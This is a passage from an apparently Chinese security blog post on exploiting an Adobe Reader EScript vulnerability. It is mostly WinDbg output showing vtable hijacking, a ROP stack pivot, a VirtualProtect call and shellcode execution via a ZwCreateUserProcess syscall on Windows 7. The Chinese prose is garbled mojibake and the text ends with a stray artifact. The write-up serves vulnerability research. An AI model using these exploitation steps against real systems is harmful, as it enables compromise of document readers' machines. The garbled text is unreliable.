  <li>ä¿®æ”¹è™šè¡¨åœ°å€ä¸ºROPæŒ‡ä»¤ï¼Œè¿›è¡Œæ ˆç½®æ¢</li>
  <li>ä¿®æ”¹shellcodeå†…å­˜å±æ€§ä¸ºå¯è¯»å¯å†™å¯æ‰§è¡Œ</li>
  <li>è·³è½¬åˆ°shellcodeæ‰§è¡Œï¼Œå®Œæˆåˆ©ç”¨</li>
</ol>

<p>è¯»å†™åŸè¯­çš„è™šè¡¨åœ°å€å¯ä»¥é€šè¿‡å¯¹è±¡å¤´çš„ä¿¡æ¯è·å–ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:014&gt; dd 20010048 L10
20010048  00000000 ffffff81 076910e0 00000000
20010058  41414141 ffffff81 00000000 00000000
20010068  00000000 00000000 00000000 00000000
20010078  00000000 00000000 00000000 00000000
0:014&gt; dps 076910e0 L4
076910e0  07627448
076910e4  07625ac0
076910e8  00000000
076910ec  674d9540 EScript!double_conversion::DoubleToStringConverter::kBase10MaximalLength+0xae630
0:014&gt; dps 07627448 L4
07627448  0763f628
0762744c  00000004
07627450  3affffff
07627454  00000040
0:014&gt; dps 0763f628 L4
0763f628  674d45e8 EScript!double_conversion::DoubleToStringConverter::kBase10MaximalLength+0xa96d8
0763f62c  07628090
0763f630  00000000
0763f634  06893c18
0:014&gt; dps 674d45e8 L8	//è¯»å†™åŸè¯­è™šè¡¨
674d45e8  67429e18 EScript!double_conversion::DoubleToStringConverter::ToPrecision+0x3a0a8
674d45ec  9c000521
674d45f0  6727ad70 EScript!mozilla::HashBytes+0x9020
674d45f4  67363bb0 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x9b870
674d45f8  6727ad70 EScript!mozilla::HashBytes+0x9020	//åªéœ€è¦ä¿®æ”¹è¯¥å¤„çš„åœ°å€ä¸ºROPæŒ‡ä»¤åœ°å€ï¼Œå³å¯å®ç°è™šè¡¨åŠ«æŒ
674d45fc  6727ad70 EScript!mozilla::HashBytes+0x9020
674d4600  6727ad70 EScript!mozilla::HashBytes+0x9020
674d4604  6727ad70 EScript!mozilla::HashBytes+0x9020
</code></pre></div></div>

<p>ROPæŒ‡ä»¤åˆ™å¯ä»¥é€‰æ‹©EScript+0x10539då¤„çš„æŒ‡ä»¤ï¼Œå°†æ ˆåœ°å€è¿ç§»åˆ°0x5d000001ã€‚åªéœ€è¦åœ¨0x5d000001å¤„å¡«å†™å¥½VirtualProtectçš„å‡½æ•°åœ°å€å’Œå¯¹åº”çš„å‚æ•°å³å¯ä¿®æ”¹shellcodeçš„å†…å­˜å±æ€§ä¸ºå¯æ‰§è¡Œï¼Œå¹¶è·³è½¬åˆ°shellcodeæ‰§è¡Œï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:013&gt; g
Breakpoint 0 hit
eax=06d54ea0 ebx=00000000 ecx=6712539d edx=6712539d esi=0034c4c0 edi=06dfe0e8
eip=6712539d esp=0034c3f8 ebp=0034c488 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x9d05d:
6712539d bc0100005d      mov     esp,5D000001h
0:000&gt; p
eax=06d54ea0 ebx=00000000 ecx=6712539d edx=6712539d esi=0034c4c0 edi=06dfe0e8
eip=671253a2 esp=5d000001 ebp=0034c488 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x9d062:
671253a2 c3              ret
0:000&gt; dps esp L6
5d000001  75bd435f kernel32!VirtualProtect
5d000005  20010070 //shellcode
5d000009  20010058 
5d00000d  00000700
5d000011  00000040
5d000015  2001006c
</code></pre></div></div>

<p>ä¸è¿‡åœ¨æ‰§è¡Œshellcodeæ—¶å‘ç°æ™®é€šçš„shellcodeè°ƒç”¨WinExecä¼šæ‰§è¡Œå¤±è´¥ï¼Œè°ƒè¯•åå‘ç°æ‰§è¡Œåˆ°ZwCreateUserProcessæ—¶å‚æ•°å†…æœ‰å †å–·çš„åƒåœ¾æ•°æ®ï¼Œæ€€ç–‘å› ä¸ºè¿™äº›æ•°æ®å¯¼è‡´æ‰§è¡Œå¤±è´¥ï¼Œæ›´æ¢shellcodeä¸ºsyscallæ‰§è¡ŒZwCreateUserProcessåæˆåŠŸè°ƒç”¨ã€‚</p>

<p>è¯¥ä»£ç æ‰§è¡Œæ–¹å¼æ— æ³•ç»•è¿‡CFGï¼Œæœ€ç»ˆåœ¨Windows7ä¸Šå®Œæˆäº†æ¼æ´åˆ©ç”¨ï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/44711.gif" alt="" /></p>

<h1 id="æ€»ç»“">æ€»ç»“</h1>

<p>è¯¥æ¼æ´åˆ©ç”¨éš¾ç‚¹åœ¨äºå¦‚ä½•å°†æ¼æ´ä»è¶Šç•Œå†…å­˜è®¿é—®è½¬åŒ–ä¸ºUAFï¼Œåç»­çš„åˆ©ç”¨è¿‡ç¨‹å’Œå…¶ä»–åŒç±»å‹æ¼æ´å¤§åŒå°å¼‚ã€‚åœ¨åˆ©ç”¨è¿‡ç¨‹ä¸­ä¹Ÿå¾—åˆ°äº†æ–‡ç« ä½œè€…æåŒå¸ˆå‚…çš„å¸®åŠ©ï¼Œå­¦ä¹ åˆ°äº†Adobeæ¼æ´çš„åˆ©ç”¨æŠ€å·§ã€‚</p>
:ET